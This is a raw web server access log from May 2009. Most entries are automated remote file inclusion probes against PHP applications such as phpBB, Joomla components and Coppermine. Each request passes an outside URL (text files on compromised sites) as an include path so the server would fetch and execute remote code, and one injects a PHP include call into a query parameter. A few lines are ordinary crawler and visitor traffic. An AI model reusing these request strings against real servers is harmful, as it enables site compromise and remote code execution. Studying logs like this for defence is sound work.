112.175.141.41 - - [29/May/2009:05:16:56 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
112.175.141.41 - - [29/May/2009:05:16:56 -0400] "GET //include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
112.175.141.41 - - [29/May/2009:05:16:56 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
123.125.64.51 - - [29/May/2009:05:17:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
70.87.152.58 - - [29/May/2009:05:17:37 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:05:17:44 -0400] "GET /logs/error_log.Q108110100//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:05:17:44 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:05:17:49 -0400] "GET /logs/error_log.Q108110100//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:05:17:49 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:05:17:49 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
199.120.90.222 - - [29/May/2009:05:17:50 -0400] "GET //appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:17:50 -0400] "GET /logs//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:17:50 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:18:01 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:18:01 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:18:06 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:18:11 -0400] "GET /logs/access_log.Q109050900//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
208.103.111.2 - - [29/May/2009:05:18:24 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:05:18:24 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:05:18:24 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:05:18:26 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:19:19 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:19:19 -0400] "GET //appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:19:19 -0400] "GET /logs//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:19:34 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:19:43 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:19:52 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:19:52 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:20:01 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:20:01 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:20:01 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:20:16 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:20:42 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:20:42 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:20:42 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:05:20:52 -0400] "GET /logs/error_log.Q108102500//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:05:20:52 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.87.152.58 - - [29/May/2009:05:20:53 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:05:20:55 -0400] "GET /logs/error_log.Q108102500//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:05:20:55 -0400] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:05:20:55 -0400] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
199.120.90.222 - - [29/May/2009:05:20:58 -0400] "GET /logs/access_log.Q109051800%20%20//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:05:21:01 -0400] "GET /logs/error_log.Q109011000//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
199.120.90.222 - - [29/May/2009:05:21:03 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:21:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.87.152.58 - - [29/May/2009:05:21:12 -0400] "GET /logs/error_log.Q109011000//accounts/inc/include.php?language=0&lang_settings[0][1]=http://chr.es.kr/02.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
211.234.100.126 - - [29/May/2009:05:21:14 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:21:21 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.234.100.126 - - [29/May/2009:05:22:14 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [29/May/2009:05:22:31 -0400] "GET /logs/access_log.Q109050700%20%20//appserv/main.php?appserv_root=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.27.203.107 - - [29/May/2009:05:22:43 -0400] "GET /logs/access_log.Q109050700//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
209.51.152.234 - - [29/May/2009:05:23:56 -0400] "GET /?_zb_path=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.51.152.234 - - [29/May/2009:05:23:56 -0400] "GET /?_zb_path=http://www.sefimli.com/tmp/bcp/rofile.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.51.152.234 - - [29/May/2009:05:23:56 -0400] "GET /?_zb_path=http://secure.burtonhosting.com/billing//include/reports/include/rotest.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.51.152.234 - - [29/May/2009:05:23:57 -0400] "GET /logs/?_zb_path=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.1" 200 3294 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.51.152.234 - - [29/May/2009:05:23:57 -0400] "GET /logs/?_zb_path=http://www.sefimli.com/tmp/bcp/rofile.txt?? HTTP/1.1" 200 3294 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.51.152.234 - - [29/May/2009:05:23:57 -0400] "GET /logs/?_zb_path=http://secure.burtonhosting.com/billing//include/reports/include/rotest.txt??? HTTP/1.1" 200 3294 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.160.145 - - [29/May/2009:05:24:05 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:05:24:05 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:05:24:05 -0400] "GET /logs/access_log.Q109051100//?_SERVER[DOCUMENT_ROOT]=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:05:25:42 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:05:25:45 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:05:25:52 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:05:25:52 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:05:25:52 -0400] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:26:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.99.192.2 - - [29/May/2009:05:26:36 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
65.99.192.2 - - [29/May/2009:05:26:37 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
201.232.54.48 - - [29/May/2009:05:27:01 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
112.175.141.41 - - [29/May/2009:05:27:49 -0400] "GET /logs/access_log.Q109050700//include/lib.inc.php?site_path=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.87.126.118 - - [29/May/2009:05:27:53 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
200.87.126.118 - - [29/May/2009:05:27:53 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
72.52.205.217 - - [29/May/2009:05:29:32 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.52.205.217 - - [29/May/2009:05:29:33 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.52.205.217 - - [29/May/2009:05:29:33 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:05:29:48 -0400] "GET /logs/access_log.Q108091400//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.103.111.2 - - [29/May/2009:05:30:05 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.52.205.217 - - [29/May/2009:05:30:41 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:05:31:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.203.180.144 - - [29/May/2009:05:31:57 -0400] "GET //?_zb_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
211.203.180.144 - - [29/May/2009:05:31:57 -0400] "GET /logs/error_log.Q108032900%20//?_zb_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
211.203.180.144 - - [29/May/2009:05:31:57 -0400] "GET /logs//?_zb_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 200 3299 "-" "libwww-perl/5.79"
72.18.148.82 - - [29/May/2009:05:32:15 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:32:15 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:05:32:15 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
66.249.68.17 - - [29/May/2009:05:32:15 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L003C38381221C100C750081+WSEQ(S0060):1+OUITEM(A0200):01107101 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.51.152.234 - - [29/May/2009:05:32:52 -0400] "GET //?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.51.152.234 - - [29/May/2009:05:32:52 -0400] "GET /logs//?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.51.152.234 - - [29/May/2009:05:32:53 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.sefimli.com/tmp/bcp/rofile.txt?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.51.152.234 - - [29/May/2009:05:32:53 -0400] "GET //?path%5Bdocroot%5D=http://www.sefimli.com/tmp/bcp/rofile.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.51.152.234 - - [29/May/2009:05:32:53 -0400] "GET //?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/rotest.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
209.51.152.234 - - [29/May/2009:05:32:53 -0400] "GET /logs//?path%5Bdocroot%5D=http://secure.burtonhosting.com/billing//include/reports/include/rotest.txt??? HTTP/1.1" 200 3299 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
74.6.8.108 - - [29/May/2009:05:32:53 -0400] "GET /logs/error_log.Q108041500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.89.181.197 - - [29/May/2009:05:33:50 -0400] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
70.89.181.197 - - [29/May/2009:05:35:20 -0400] "GET /logs/error_log.Q108092700/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.813"
70.89.181.197 - - [29/May/2009:05:35:21 -0400] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.813"
70.89.181.197 - - [29/May/2009:05:35:21 -0400] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
70.89.181.197 - - [29/May/2009:05:35:27 -0400] "GET /logs/error_log.Q108111900/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.813"
70.238.160.36 - - [29/May/2009:05:35:44 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 2.0.50727)"
70.238.160.36 - - [29/May/2009:05:35:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 2.0.50727)"
70.238.160.36 - - [29/May/2009:05:35:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 2.0.50727)"
70.238.160.36 - - [29/May/2009:05:35:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.1; .NET CLR 2.0.50727)"
222.122.160.145 - - [29/May/2009:05:35:58 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:05:35:58 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
222.122.160.145 - - [29/May/2009:05:35:58 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://holytrinityparish.org/calndr_set/boxes/_notes/29id?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
93.188.112.35 - - [29/May/2009:05:36:05 -0400] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
93.188.112.35 - - [29/May/2009:05:36:05 -0400] "GET /logs/access_log.Q109051100//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.taichilyon.fr/forum/styles/prosilver/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
